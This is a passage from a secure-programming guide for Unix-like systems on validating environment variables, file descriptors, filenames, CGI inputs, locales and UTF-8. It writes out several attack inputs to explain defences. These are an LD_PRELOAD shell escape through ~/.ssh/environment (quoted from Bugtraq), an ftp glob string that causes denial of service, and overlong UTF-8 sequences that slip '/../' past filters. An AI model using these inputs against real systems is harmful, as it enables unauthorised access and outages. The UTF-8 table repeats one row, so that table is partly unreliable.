setenv(3) and eliminate environment variables using unsetenv(3). I should
note here that setenv(3) is implemented in Linux, too.

However, crackers need not be so nice; crackers can directly control the
environment variable data area passed to a program using execve(2). This
permits some nasty attacks, which can only be understood by understanding how
environment variables really work. In Linux, you can see environ(5) for a
summary how about environment variables really work. In short, environment
variables are internally stored as a pointer to an array of pointers to
characters; this array is stored in order and terminated by a NULL pointer
(so you'll know when the array ends). The pointers to characters, in turn,
each point to a NIL-terminated string value of the form ``NAME=value''. This
has several implications, for example, environment variable names can't
include the equal sign, and neither the name nor value can have embedded NIL
characters. However, a more dangerous implication of this format is that it
allows multiple entries with the same variable name, but with different
values (e.g., more than one value for SHELL). While typical command shells
prohibit doing this, a locally-executing cracker can create such a situation
using execve(2).

The problem with this storage format (and the way it's set) is that a program
might check one of these values (to see if it's valid) but actually use a
different one. In Linux, the GNU glibc libraries try to shield programs from
this; glibc 2.1's implementation of getenv will always get the first matching
entry, setenv and putenv will always set the first matching entry, and
unsetenv will actually unset all of the matching entries (congratulations to
the GNU glibc implementers for implementing unsetenv this way!). However,
some programs go directly to the environ variable and iterate across all
environment variables; in this case, they might use the last matching entry
instead of the first one. As a result, if checks were made against the first
matching entry instead, but the actual value used is the last matching entry,
a cracker can use this fact to circumvent the protection routines.
-----------------------------------------------------------------------------

5.2.3. The Solution - Extract and Erase

For secure setuid/setgid programs, the short list of environment variables
needed as input (if any) should be carefully extracted. Then the entire
environment should be erased, followed by resetting a small set of necessary
environment variables to safe values. There really isn't a better way if you
make any calls to subordinate programs; there's no practical method of
listing ``all the dangerous values''. Even if you reviewed the source code of
every program you call directly or indirectly, someone may add new
undocumented environment variables after you write your code, and one of them
may be exploitable.

The simple way to erase the environment in C/C++ is by setting the global
variable environ to NULL. The global variable environ is defined in <unistd.h
>; C/C++ users will want to #include this header file. You will need to
manipulate this value before spawning threads, but that's rarely a problem,
since you want to do these manipulations very early in the program's
execution (usually before threads are spawned).

The global variable environ's definition is defined in various standards;
it's not clear that the official standards condone directly changing its
value, but I'm unaware of any Unix-like system that has trouble with doing
this. I normally just modify the ``environ'' directly; manipulating such
low-level components is possibly non-portable, but it assures you that you
get a clean (and safe) environment. In the rare case where you need later
access to the entire set of variables, you could save the ``environ''
variable's value somewhere, but this is rarely necessary; nearly all programs
need only a few values, and the rest can be dropped.

Another way to clear the environment is to use the undocumented clearenv()
function. The function clearenv() has an odd history; it was supposed to be
defined in POSIX.1, but somehow never made it into that standard. However,
clearenv() is defined in POSIX.9 (the Fortran 77 bindings to POSIX), so there
is a quasi-official status for it. In Linux, clearenv() is defined in <
stdlib.h>, but before using #include to include it you must make sure that
__USE_MISC is #defined. A somewhat more ``official'' approach is to cause
__USE_MISC to be defined is to first #define either _SVID_SOURCE or
_BSD_SOURCE, and then #include <features.h> - these are the official feature
test macros.

One environment value you'll almost certainly re-add is PATH, the list of
directories to search for programs; PATH should not include the current
directory and usually be something simple like ``/bin:/usr/bin''. Typically
you'll also set IFS (to its default of `` \t\n'', where space is the first
character) and TZ (timezone). Linux won't die if you don't supply either IFS
or TZ, but some System V based systems have problems if you don't supply a TZ
value, and it's rumored that some shells need the IFS value set. In Linux,
see environ(5) for a list of common environment variables that you might want
to set.

If you really need user-supplied values, check the values first (to ensure
that the values match a pattern for legal values and that they are within
some reasonable maximum length). Ideally there would be some standard trusted
file in /etc with the information for ``standard safe environment variable
values'', but at this time there's no standard file defined for this purpose.
For something similar, you might want to examine the PAM module pam_env on
those systems which have that module. If you allow users to set an arbitrary
environment variable, then you'll let them subvert restricted shells (more on
that below).

If you're using a shell as your programming language, you can use the ``/usr/
bin/env'' program with the ``-'' option (which erases all environment
variables of the program being run). Basically, you call /usr/bin/env, give
it the ``-'' option, follow that with the set of variables and their values
you wish to set (as name=value), and then follow that with the name of the
program to run and its arguments. You usually want to call the program using
the full pathname (/usr/bin/env) and not just as ``env'', in case a user has
created a dangerous PATH value. Note that GNU's env also accepts the options
"-i" and "--ignore-environment" as synonyms (they also erase the environment
of the program being started), but these aren't portable to other versions of
env.

If you're programming a setuid/setgid program in a language that doesn't
allow you to reset the environment directly, one approach is to create a
``wrapper'' program. The wrapper sets the environment program to safe values,
and then calls the other program. Beware: make sure the wrapper will actually
invoke the intended program; if it's an interpreted program, make sure
there's no race condition possible that would allow the interpreter to load a
different program than the one that was granted the special setuid/setgid
privileges.
-----------------------------------------------------------------------------

5.2.4. Don't Let Users Set Their Own Environment Variables

If you allow users to set their own environment variables, then users will be
able to escape out of restricted accounts (these are accounts that are
supposed to only let the users run certain programs and not work as a
general-purpose machine). This includes letting users write or modify certain
files in their home directory (e.g., like .login), supporting conventions
that load in environment variables from files under the user's control (e.g.,
openssh's .ssh/environment file), or supporting protocols that transfer
environment variables (e.g., the Telnet Environment Option; see CERT Advisory
CA-1995-14 for more). Restricted accounts should never be allowed to modify
or add any file directly contained in their home directory, and instead
should be given only a specific subdirectory that they are allowed to modify
(if they can modify any).

ari posted a detailed discussion of this problem on Bugtraq on June 24, 2002:


    Given the similarities with certain other security issues, i'm surprised
    this hasn't been discussed earlier. If it has, people simply haven't paid
    it enough attention.

    This problem is not necessarily ssh-specific, though most telnet daemons
    that support environment passing should already be configured to remove
    dangerous variables due to a similar (and more serious) issue back in '95
    (ref: [1]). I will give ssh-based examples here.

    Scenario one: Let's say admin bob has a host that he wants to give people
    ftp access to. Bob doesn't want anyone to have the ability to actually
    _log into_ his system, so instead of giving users normal shells, or even
    no shells, bob gives them all (say) /usr/sbin/nologin, a program he wrote
    himself in C to essentially log the attempt to syslog and exit,
    effectively ending the user's session. As far as most people are
    concerned, the user can't do much with this aside from, say, setting up
    an encrypted tunnel.

    The thing is, bob's system uses dynamic libraries (as most do), and /usr/
    sbin/nologin is dynamically linked (as most such programs are). If a user
    can set his environment variables (e.g. by uploading a '.ssh/environment'
    file) and put some arbitrary file on the system (e.g. 'doevilstuff.so'),
    he can bypass any functionality of /usr/sbin/nologin completely via
    LD_PRELOAD (or another member of the LD_* environment family).

    The user can now gain a shell on the system (with his own privileges, of
    course, barring any 'UseLogin' issues (ref: [2])), and administrator bob,
    if he were aware of what just occurred, would be extremely unhappy.

    Granted, there are all kinds of interesting ways to (more or less) do
    away with this problem. Bob could just grit his teeth and give the ftp
    users a nonexistent shell, or he could statically compile nologin,
    assuming his operating system comes with static libraries. Bob could
    also, humorously, make his nologin program setuid and let the standard C
    library take care of the situation. Then, of course, there are also the
    ssh-specific access controls such as AllowGroup and AllowUsers. These may
    appease the situation in this scenario, but it does not correct the
    problem.

    ... Now, what happens if bob, instead of using /usr/sbin/nologin, wants
    to use (for example) some BBS-type interface that he wrote up or
    downloaded? It can be a script written in perl or tcl or python, or it
    could be a compiled program; doesn't matter. Additionally, bob need not
    be running an ftp server on this host; instead, perhaps bob uses nfs or
    veritas to mount user home directories from a fileserver on his network;
    this exact setup is (unfortunately) employed by many bastion hosts,
    password management hosts and mail servers---to name a few. Perhaps bob
    runs an ISP, and replaces the user's shell when he doesn't pay. With all
    of these possible (and common) scenarios, bob's going to have a somewhat
    more difficult time getting around the problem.

    ... Exploitation of the problem is simple. The circumvention code would
    be compiled into a dynamic library and LD_PRELOAD=/path/to/evil.so should
    be placed into ~user/.ssh/environment (a similar environment option may
    be appended to public keys in the authohrized_keys file). If no
    dynamically loadable programs are executed, this will have no effect.

    ISPs and universities (along with similarly affected organizations)
    should compile their rejection (or otherwise restricted) binaries
    statically (assuming your operating system comes with static
    libraries)...

    Ideally, sshd (and all remote access programs that allow user-definable
    environments) should strip any environment settings that libc ignores for
    setuid programs.

-----------------------------------------------------------------------------
5.3. File Descriptors

A program is passed a set of ``open file descriptors'', that is, pre-opened
files. A setuid/setgid program must deal with the fact that the user gets to
select what files are open and to what (within their permission limits). A
setuid/setgid program must not assume that opening a new file will always
open into a fixed file descriptor id, or that the open will succeed at all.
It must also not assume that standard input (stdin), standard output
(stdout), and standard error (stderr) refer to a terminal or are even open.

The rationale behind this is easy; since an attacker can open or close a file
descriptor before starting the program, the attacker could create an
unexpected situation. If the attacker closes the standard output, when the
program opens the next file it will be opened as though it were standard
output, and then it will send all standard output to that file as well. Some
C libraries will automatically open stdin, stdout, and stderr if they aren't
already open (to /dev/null), but this isn't true on all Unix-like systems.
Also, these libraries can't be completely depended on; for example, on some
systems it's possible to create a race condition that causes this automatic
opening to fail (and still run the program).
-----------------------------------------------------------------------------

5.4. File Names

The names of files can, in certain circumstances, cause serious problems.
This is especially a problem for secure programs that run on computers with
local untrusted users, but this isn't limited to that circumstance. Remote
users may be able to trick a program into creating undesirable filenames
(programs should prevent this, but not all do), or remote users may have
partially penetrated a system and try using this trick to penetrate the rest
of the system.

Usually you will want to not include ``..'' (higher directory) as a legal
value from an untrusted user, though that depends on the circumstances. You
might also want to list only the characters you will permit, and forbidding
any filenames that don't match the list. It's best to prohibit any change in
directory, e.g., by not including ``/'' in the set of legal characters, if
you're taking data from an external user and transforming it into a filename.

Often you shouldn't support ``globbing'', that is, expanding filenames using
``*'', ``?'', ``['' (matching ``]''), and possibly ``{'' (matching ``}'').
For example, the command ``ls *.png'' does a glob on ``*.png'' to list all
PNG files. The C fopen(3) command (for example) doesn't do globbing, but the
command shells perform globbing by default, and in C you can request globbing
using (for example) glob(3). If you don't need globbing, just use the calls
that don't do it where possible (e.g., fopen(3)) and/or disable them (e.g.,
escape the globbing characters in a shell). Be especially careful if you want
to permit globbing. Globbing can be useful, but complex globs can take a
great deal of computing time. For example, on some ftp servers, performing a
few of these requests can easily cause a denial-of-service of the entire
machine:
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
Trying to allow globbing, yet limit globbing patterns, is probably futile.
Instead, make sure that any such programs run as a separate process and use
process limits to limit the amount of CPU and other resources they can
consume. See Section 7.4.8 for more information on this approach, and see
Section 3.6 for more information on how to set these limits.

Unix-like systems generally forbid including the NIL character in a filename
(since this marks the end of the name) and the '/' character (since this is
the directory separator). However, they often permit anything else, which is
a problem; it is easy to write programs that can be subverted by
cleverly-created filenames.

Filenames that can especially cause problems include:

<A0><A0>*<2A>Filenames with leading dashes (-). If passed to other programs, this may
    cause the other programs to misinterpret the name as option settings.
    Ideally, Unix-like systems shouldn't allow these filenames; they aren't
    needed and create many unnecessary security problems. Unfortunately,
    currently developers have to deal with them. Thus, whenever calling
    another program with a filename, insert ``--'' before the filename
    parameters (to stop option processing, if the program supports this
    common request) or modify the filename (e.g., insert ``./'' in front of
    the filename to keep the dash from being the lead character).

<A0><A0>*<2A>Filenames with control characters. This especially includes newlines and
    carriage returns (which are often confused as argument separators inside
    shell scripts, or can split log entries into multiple entries) and the
    ESCAPE character (which can interfere with terminal emulators, causing
    them to perform undesired actions outside the user's control). Ideally,
    Unix-like systems shouldn't allow these filenames either; they aren't
    needed and create many unnecessary security problems.

<A0><A0>*<2A>Filenames with spaces; these can sometimes confuse a shell into being
    multiple arguments, with the other arguments causing problems. Since
    other operating systems allow spaces in filenames (including Windows and
    MacOS), for interoperability's sake this will probably always be
    permitted. Please be careful in dealing with them, e.g., in the shell use
    double-quotes around all filename parameters whenever calling another
    program. You might want to forbid leading and trailing spaces at least;
    these aren't as visible as when they occur in other places, and can
    confuse human users.

<A0><A0>*<2A>Invalid character encoding. For example, a program may believe that the
    filename is UTF-8 encoded, but it may have an invalidly long UTF-8
    encoding. See Section 5.9.2 for more information. I'd like to see
    agreement on the character encoding used for filenames (e.g., UTF-8), and
    then have the operating system enforce the encoding (so that only legal
    encodings are allowed), but that hasn't happened at this time.

<A0><A0>*<2A>Another other character special to internal data formats, such as ``<'',
    ``;'', quote characters, backslash, and so on.


-----------------------------------------------------------------------------
5.5. File Contents

If a program takes directions from a file, it must not trust that file
specially unless only a trusted user can control its contents. Usually this
means that an untrusted user must not be able to modify the file, its
directory, or any of its ancestor directories. Otherwise, the file must be
treated as suspect.

If the directions in the file are supposed to be from an untrusted user, then
make sure that the inputs from the file are protected as describe throughout
this book. In particular, check that values match the set of legal values,
and that buffers are not overflowed.
-----------------------------------------------------------------------------

5.6. Web-Based Application Inputs (Especially CGI Scripts)

Web-based applications (such as CGI scripts) run on some trusted server and
must get their input data somehow through the web. Since the input data
generally come from untrusted users, this input data must be validated.
Indeed, this information may have actually come from an untrusted third
party; see Section 7.15 for more information. For example, CGI scripts are
passed this information through a standard set of environment variables and
through standard input. The rest of this text will specifically discuss CGI,
because it's the most common technique for implementing dynamic web content,
but the general issues are the same for most other dynamic web content
techniques.

One additional complication is that many CGI inputs are provided in so-called
``URL-encoded'' format, that is, some values are written in the format %HH
where HH is the hexadecimal code for that byte. You or your CGI library must
handle these inputs correctly by URL-decoding the input and then checking if
the resulting byte value is acceptable. You must correctly handle all values,
including problematic values such as %00 (NIL) and %0A (newline). Don't
decode inputs more than once, or input such as ``%2500'' will be mishandled
(the %25 would be translated to ``%'', and the resulting ``%00'' would be
erroneously translated to the NIL character).

CGI scripts are commonly attacked by including special characters in their
inputs; see the comments above.

Another form of data available to web-based applications are ``cookies.''
Again, users can provide arbitrary cookie values, so they cannot be trusted
unless special precautions are taken. Also, cookies can be used to track
users, potentially invading user privacy. As a result, many users disable
cookies, so if possible your web application should be designed so that it
does not require the use of cookies (but see my later discussion for when you
must authenticate individual users). I encourage you to avoid or limit the
use of persistent cookies (cookies that last beyond a current session),
because they are easily abused. Indeed, U.S. agencies are currently forbidden
to use persistent cookies except in special circumstances, because of the
concern about invading user privacy; see the OMB guidance in memorandum
M-00-13 (June 22, 2000). Note that to use cookies, some browsers may insist
that you have a privacy profile (named p3p.xml on the root directory of the
server).

Some HTML forms include client-side input checking to prevent some illegal
values; these are typically implemented using Javascript/ECMAscript or Java.
This checking can be helpful for the user, since it can happen
``immediately'' without requiring any network access. However, this kind of
input checking is useless for security, because attackers can send such
``illegal'' values directly to the web server without going through the
checks. It's not even hard to subvert this; you don't have to write a program
to send arbitrary data to a web application. In general, servers must perform
all their own input checking (of form data, cookies, and so on) because they
cannot trust clients to do this securely. In short, clients are generally not
``trustworthy channels''. See Section 7.11 for more information on
trustworthy channels.

A brief discussion on input validation for those using Microsoft's Active
Server Pages (ASP) is available from Jerry Connolly at [http://
heap.nologin.net/aspsec.html] http://heap.nologin.net/aspsec.html
-----------------------------------------------------------------------------

5.7. Other Inputs

Programs must ensure that all inputs are controlled; this is particularly
difficult for setuid/setgid programs because they have so many such inputs.
Other inputs programs must consider include the current directory, signals,
memory maps (mmaps), System V IPC, pending timers, resource limits, the
scheduling priority, and the umask (which determines the default permissions
of newly-created files). Consider explicitly changing directories (using
chdir(2)) to an appropriately fully named directory at program startup.
-----------------------------------------------------------------------------

5.8. Human Language (Locale) Selection

As more people have computers and the Internet available to them, there has
been increasing pressure for programs to support multiple human languages and
cultures. This combination of language and other cultural factors is usually
called a ``locale''. The process of modifying a program so it can support
multiple locales is called ``internationalization'' (i18n), and the process
of providing the information for a particular locale to a program is called
``localization'' (l10n).

Overall, internationalization is a good thing, but this process provides
another opportunity for a security exploit. Since a potentially untrusted
user provides information on the desired locale, locale selection becomes
another input that, if not properly protected, can be exploited.
-----------------------------------------------------------------------------

5.8.1. How Locales are Selected

In locally-run programs (including setuid/setgid programs), locale
information is provided by an environment variable. Thus, like all other
environment variables, these values must be extracted and checked against
valid patterns before use.

For web applications, this information can be obtained from the web browser
(via the Accept-Language request header). However, since not all web browsers
properly pass this information (and not all users configure their browsers
properly), this is used less often than you might think. Often, the language
requested in a web browser is simply passed in as a form value. Again, these
values must be checked for validity before use, as with any other form value.

In either case, locale information is really just a special case of input
discussed in the previous sections. However, because this input is so rarely
considered, I'm discussing it separately. In particular, when combined with
format strings (discussed later), user-controlled strings can permit
attackers to force other programs to run arbitrary instructions, corrupt
data, and do other unfortunate actions.
-----------------------------------------------------------------------------

5.8.2. Locale Support Mechanisms

There are two major library interfaces for supporting locale-selected
messages on Unix-like systems, one called ``catgets'' and the other called
``gettext''. In the catgets approach, every string is assigned a unique
number, which is used as an index into a table of messages. In contrast, in
the gettext approach, a string (usually in English) is used to look up a
table that translates the original string. catgets(3) is an accepted standard
(via the X/Open Portability Guide, Volume 3 and Single Unix Specification),
so it's possible your program uses it. The ``gettext'' interface is not an
official standard, (though it was originally a UniForum proposal), but I
believe it's the more widely used interface (it's used by Sun and essentially
all GNU programs).

In theory, catgets should be slightly faster, but this is at best marginal on
today's machines, and the bookkeeping effort to keep unique identifiers valid
in catgets() makes the gettext() interface much easier to use. I'd suggest
using gettext(), just because it's easier to use. However, don't take my word
for it; see GNU's documentation on gettext (info:gettext#catgets) for a
longer and more descriptive comparison.

The catgets(3) call (and its associated catopen(3) call) in particular is
vulnerable to security problems, because the environment variable NLSPATH can
be used to control the filenames used to acquire internationalized messages.
The GNU C library ignores NLSPATH for setuid/setgid programs, which helps,
but that doesn't protect programs running on other implementations, nor other
programs (like CGI scripts) which don't ``appear'' to require such
protection.

The widely-used ``gettext'' interface is at least not vulnerable to a
malicious NLSPATH setting to my knowledge. However, it appears likely to me
that malicious settings of LC_ALL or LC_MESSAGES could cause problems. Also,
if you use gettext's bindtextdomain() routine in its file cat-compat.c, that
does depend on NLSPATH.
-----------------------------------------------------------------------------

5.8.3. Legal Values

For the moment, if you must permit untrusted users to set information on
their desired locales, make sure the provided internationalization
information meets a narrow filter that only permits legitimate locale names.
For user programs (especially setuid/setgid programs), these values will come
in via NLSPATH, LANGUAGE, LANG, the old LINGUAS, LC_ALL, and the other LC_*
values (especially LC_MESSAGES, but also including LC_COLLATE, LC_CTYPE,
LC_MONETARY, LC_NUMERIC, and LC_TIME). For web applications, this
user-requested set of language information would be done via the
Accept-Language request header or a form value (the application should
indicate the actual language setting of the data being returned via the
Content-Language heading). You can check this value as part of your
environment variable filtering if your users can set your environment
variables (i.e., setuid/setgid programs) or as part of your input filtering
(e.g., for CGI scripts). The GNU C library "glibc" doesn't accept some values
of LANG for setuid/setgid programs (in particular anything with "/"), but
errors have been found in that filtering (e.g., Red Hat released an update to
fix this error in glibc on September 1, 2000). This kind of filtering isn't
required by any standard, so you're safer doing this filtering yourself. I
have not found any guidance on filtering language settings, so here are my
suggestions based on my own research into the issue.

First, a few words about the legal values of these settings. Language
settings are generally set using the standard tags defined in IETF RFC 1766
(which uses two-letter country codes as its basic tag, followed by an
optional subtag separated by a dash; I've found that environment variable
settings use the underscore instead). However, some find this insufficiently
flexible, so three-letter country codes may soon be used as well. Also, there
are two major not-quite compatible extended formats, the X/Open Format and
the CEN Format (European Community Standard); you'd like to permit both.
Typical values include ``C'' (the C locale), ``EN'' (English''), and
``FR_fr'' (French using the territory of France's conventions). Also, so many
people use nonstandard names that programs have had to develop ``alias''
systems to cope with nonstandard names (for GNU gettext, see /usr/share/
locale/locale.alias, and for X11, see /usr/lib/X11/locale/locale.alias; you
might need "aliases" instead of "alias"); they should usually be permitted as
well. Libraries like gettext() have to accept all these variants and find an
appropriate value, where possible. One source of further information is FSF
[1999]; another source is the li18nux.org web site. A filter should not
permit characters that aren't needed, in particular ``/'' (which might permit
escaping out of the trusted directories) and ``..'' (which might permit going
up one directory). Other dangerous characters in NLSPATH include ``%'' (which
indicates substitution) and ``:'' (which is the directory separator); the
documentation I have for other machines suggests that some implementations
may use them for other values, so it's safest to prohibit them.
-----------------------------------------------------------------------------

5.8.4. Bottom Line

In short, I suggest simply erasing or re-setting the NLSPATH, unless you have
a trusted user supplying the value. For the Accept-Language heading in HTTP
(if you use it), form values specifying the locale, and the environment
variables LANGUAGE, LANG, the old LINGUAS, LC_ALL, and the other LC_* values
listed above, filter the locales from untrusted users to permit null (empty)
values or to only permit values that match in total this regular expression
(note that I've recently added "="):
 [A-Za-z][A-Za-z0-9_,+@\-\.=]*
I haven't found any legitimate locale which doesn't match this pattern, but
this pattern does appear to protect against locale attacks. Of course,
there's no guarantee that there are messages available in the requested
locale, but in such a case these routines will fall back to the default
messages (usually in English), which at least is not a security problem.

If you wish to be really picky, and only patterns that match li18nux's locale
pattern, you can use this pattern instead:
 ^[A-Za-z]+(_[A-Za-z]+)?
 (\.[A-Z]+(\-[A-Z0-9]+)*)?
 (\@[A-Za-z0-9]+(\=[A-Za-z0-9\-]+)
  (,[A-Za-z0-9]+(\=[A-Za-z0-9\-]+))*)?$
In both cases, these patterns use POSIX's extended (``modern'') regular
expression notation (see regex(3) and regex(7) on Unix-like systems).

Of course, languages cannot be supported without a standard way to represent
their written symbols, which brings us to the issue of character encoding.
-----------------------------------------------------------------------------

5.9. Character Encoding

5.9.1. Introduction to Character Encoding

For many years Americans have exchanged text using the ASCII character set;
since essentially all U.S. systems support ASCII, this permits easy exchange
of English text. Unfortunately, ASCII is completely inadequate in handling
the characters of nearly all other languages. For many years different
countries have adopted different techniques for exchanging text in different
languages, making it difficult to exchange data in an increasingly
interconnected world.

More recently, ISO has developed ISO 10646, the ``Universal Mulitple-Octet
Coded Character Set (UCS). UCS is a coded character set which defines a
single 31-bit value for each of all of the world's characters. The first
65536 characters of the UCS (which thus fit into 16 bits) are termed the
``Basic Multilingual Plane'' (BMP), and the BMP is intended to cover nearly
all of today's spoken languages. The Unicode forum develops the Unicode
standard, which concentrates on the UCS and adds some additional conventions
to aid interoperability. Historically, Unicode and ISO 10646 were developed
by competing groups, but thankfully they realized that they needed to work
together and they now coordinate with each other.

If you're writing new software that handles internationalized characters, you
should be using ISO 10646/Unicode as your basis for handling international
characters. However, you may need to process older documents in various older
(language-specific) character sets, in which case, you need to ensure that an
untrusted user cannot control the setting of another document's character set
(since this would significantly affect the document's interpretation).
-----------------------------------------------------------------------------

5.9.2. Introduction to UTF-8

Most software is not designed to handle 16 bit or 32 bit characters, yet to
create a universal character set more than 8 bits was required. Therefore, a
special format called ``UTF-8'' was developed to encode these potentially
international characters in a format more easily handled by existing programs
and libraries. UTF-8 is defined, among other places, in IETF RFC 2279, so
it's a well-defined standard that can be freely read and used. UTF-8 is a
variable-width encoding; characters numbered 0 to 0x7f (127) encode to
themselves as a single byte, while characters with larger values are encoded
into 2 to 6 bytes of information (depending on their value). The encoding has
been specially designed to have the following nice properties (this
information is from the RFC and Linux utf-8 man page):

<A0><A0>*<2A>The classical US ASCII characters (0 to 0x7f) encode as themselves, so
    files and strings which contain only 7-bit ASCII characters have the same
    encoding under both ASCII and UTF-8. This is fabulous for backward
    compatibility with the many existing U.S. programs and data files.

<A0><A0>*<2A>All UCS characters beyond 0x7f are encoded as a multibyte sequence
    consisting only of bytes in the range 0x80 to 0xfd. This means that no
    ASCII byte can appear as part of another character. Many other encodings
    permit characters such as an embedded NIL, causing programs to fail.

<A0><A0>*<2A>It's easy to convert between UTF-8 and a 2-byte or 4-byte fixed-width
    representations of characters (these are called UCS-2 and UCS-4
    respectively).

<A0><A0>*<2A>The lexicographic sorting order of UCS-4 strings is preserved, and the
    Boyer-Moore fast search algorithm can be used directly with UTF-8 data.

<A0><A0>*<2A>All possible 2^31 UCS codes can be encoded using UTF-8.

<A0><A0>*<2A>The first byte of a multibyte sequence which represents a single
    non-ASCII UCS character is always in the range 0xc0 to 0xfd and indicates
    how long this multibyte sequence is. All further bytes in a multibyte
    sequence are in the range 0x80 to 0xbf. This allows easy
    resynchronization; if a byte is missing, it's easy to skip forward to the
    ``next'' character, and it's always easy to skip forward and back to the
    ``next'' or ``preceding'' character.


In short, the UTF-8 transformation format is becoming a dominant method for
exchanging international text information because it can support all of the
world's languages, yet it is backward compatible with U.S. ASCII files as
well as having other nice properties. For many purposes I recommend its use,
particularly when storing data in a ``text'' file.
-----------------------------------------------------------------------------

5.9.3. UTF-8 Security Issues

The reason to mention UTF-8 is that some byte sequences are not legal UTF-8,
and this might be an exploitable security hole. UTF-8 encoders are supposed
to use the ``shortest possible'' encoding, but naive decoders may accept
encodings that are longer than necessary. Indeed, earlier standards permitted
decoders to accept ``non-shortest form'' encodings. The problem here is that
this means that potentially dangerous input could be represented multiple
ways, and thus might defeat the security routines checking for dangerous
inputs. The RFC describes the problem this way:


    Implementers of UTF-8 need to consider the security aspects of how they
    handle illegal UTF-8 sequences. It is conceivable that in some
    circumstances an attacker would be able to exploit an incautious UTF-8
    parser by sending it an octet sequence that is not permitted by the UTF-8
    syntax.

    A particularly subtle form of this attack could be carried out against a
    parser which performs security-critical validity checks against the UTF-8
    encoded form of its input, but interprets certain illegal octet sequences
    as characters. For example, a parser might prohibit the NUL character
    when encoded as the single-octet sequence 00, but allow the illegal
    two-octet sequence C0 80 (illegal because it's longer than necessary) and
    interpret it as a NUL character (00). Another example might be a parser
    which prohibits the octet sequence 2F 2E 2E 2F ("/../"), yet permits the
    illegal octet sequence 2F C0 AE 2E 2F.


A longer discussion about this is available at Markus Kuhn's UTF-8 and
Unicode FAQ for Unix/Linux at [http://www.cl.cam.ac.uk/~mgk25/unicode.html]
http://www.cl.cam.ac.uk/~mgk25/unicode.html.
-----------------------------------------------------------------------------

5.9.4. UTF-8 Legal Values

Thus, when accepting UTF-8 input, you need to check if the input is valid
UTF-8. Here is a list of all legal UTF-8 sequences; any character sequence
not matching this table is not a legal UTF-8 sequence. In the following
table, the first column shows the various character values being encoded into
UTF-8. The second column shows how those characters are encoded as binary
values; an ``x'' indicates where the data is placed (either a 0 or 1), though
some values should not be allowed because they're not the shortest possible
encoding. The last row shows the valid values each byte can have (in
hexadecimal). Thus, a program should check that every character meets one of
the patterns in the right-hand column. A ``-'' indicates a range of legal
values (inclusive). Of course, just because a sequence is a legal UTF-8
sequence doesn't mean that you should accept it (you still need to do all
your other checking), but generally you should check any UTF-8 data for UTF-8
legality before performing other checks.


Table 5-1. Legal UTF-8 Sequences
+------------------------+-------------------------+------------------------+
|UCS Code (Hex)          |Binary UTF-8 Format      |Legal UTF-8 Values (Hex)|
+------------------------+-------------------------+------------------------+
|00-7F                   |0xxxxxxx                 |00-7F                   |
+------------------------+-------------------------+------------------------+
|80-7FF                  |110xxxxx 10xxxxxx        |C2-DF 80-BF             |
+------------------------+-------------------------+------------------------+
|800-FFF                 |1110xxxx 10xxxxxx        |E0 A0*-BF 80-BF         |
|                        |10xxxxxx                 |                        |
+------------------------+-------------------------+------------------------+
|1000-FFFF               |1110xxxx 10xxxxxx        |E1-EF 80-BF 80-BF       |
|                        |10xxxxxx                 |                        |
+------------------------+-------------------------+------------------------+
|10000-3FFFF             |11110xxx 10xxxxxx        |F0 90*-BF 80-BF 80-BF   |
|                        |10xxxxxx 10xxxxxx        |                        |
+------------------------+-------------------------+------------------------+
|40000-FFFFFF            |11110xxx 10xxxxxx        |F1-F3 80-BF 80-BF 80-BF |
|                        |10xxxxxx 10xxxxxx        |                        |
+------------------------+-------------------------+------------------------+
|40000-FFFFFF            |11110xxx 10xxxxxx        |F1-F3 80-BF 80-BF 80-BF |
|                        |10xxxxxx 10xxxxxx        |                        |
+------------------------+-------------------------+------------------------+
|100000-10FFFFF          |11110xxx 10xxxxxx        |F4 80-8F* 80-BF 80-BF   |
|                        |10xxxxxx 10xxxxxx        |                        |
+------------------------+-------------------------+------------------------+
|200000-3FFFFFF          |111110xx 10xxxxxx        |too large; see below    |
|                        |10xxxxxx 10xxxxxx        |                        |
|                        |10xxxxxx                 |                        |
+------------------------+-------------------------+------------------------+
|04000000-7FFFFFFF       |1111110x 10xxxxxx        |too large; see below    |
|                        |10xxxxxx 10xxxxxx        |                        |
|                        |10xxxxxx 10xxxxxx        |                        |
+------------------------+-------------------------+------------------------+

As I noted earlier, there are two standards for character sets, ISO 10646 and
Unicode, who have agreed to synchronize their character assignments. The
definition of UTF-8 in ISO/IEC 10646-1:2000 and the IETF RFC also currently
support five and six byte sequences to encode characters outside the range
supported by Uniforum's Unicode, but such values can't be used to support
Unicode characters and it's expected that a future version of ISO 10646 will
have the same limits. Thus, for most purposes the five and six byte UTF-8
encodings aren't legal, and you should normally reject them (unless you have
a special purpose for them).

This is set of valid values is tricky to determine, and in fact earlier
versions of this document got some entries wrong (in some cases it permitted
overlong characters). Language developers should include a function in their
libraries to check for valid UTF-8 values, just because it's so hard to get
right.

I should note that in some cases, you might want to cut slack (or use
internally) the hexadecimal sequence C0 80. This is an overlong sequence
that, if permitted, can represent ASCII NUL (NIL). Since C and C++ have
trouble including a NIL character in an ordinary string, some people have
taken to using this sequence when they want to represent NIL as part of the
data stream; Java even enshrines the practice. Feel free to use C0 80
internally while processing data, but technically you really should translate
this back to 00 before saving the data. Depending on your needs, you might
decide to be ``sloppy'' and accept C0 80 as input in a UTF-8 data stream. If
it doesn't harm security, it's probably a good practice to accept this
sequence since accepting it aids interoperability.

Handling this can be tricky. You might want to examine the C routines
developed by Unicode to handle conversions, available at [ftp://
ftp.unicode.org/Public/PROGRAMS/CVTUTF/ConvertUTF.c] ftp://ftp.unicode.org/
Public/PROGRAMS/CVTUTF/ConvertUTF.c. It's unclear to me if these routines are
open source software (the licenses don't clearly say whether or not they can
be modified), so beware of that.
-----------------------------------------------------------------------------

5.9.5. UTF-8 Related Issues

This section has discussed UTF-8, because it's the most popular multibyte
encoding of UCS, simplifying a lot of international text handling issues.
However, it's certainly not the only encoding; there are other encodings,
such as UTF-16 and UTF-7, which have the same kinds of issues and must be
validated for the same reasons.

Another issue is that some phrases can be expressed in more than one way in
ISO 10646/Unicode. For example, some accented characters can be represented
as a single character (with the accent) and also as a set of characters
(e.g., the base character plus a separate composing accent). These two forms
may appear identical. There's also a zero-width space that could be inserted,
with the result that apparently-similar items are considered different.
Beware of situations where such hidden text could interfere with the program.
This is an issue that in general is hard to solve; most programs don't have
such tight control over the clients that they know completely how a
particular sequence will be displayed (since this depends on the client's
font, display characteristics, locale, and so on).
-----------------------------------------------------------------------------

5.10. Prevent Cross-site Malicious Content on Input

Some programs accept data from one untrusted user and pass that data on to a
second user; the second user's application may then process that data in a
way harmful to the second user. This is a particularly common problem for web
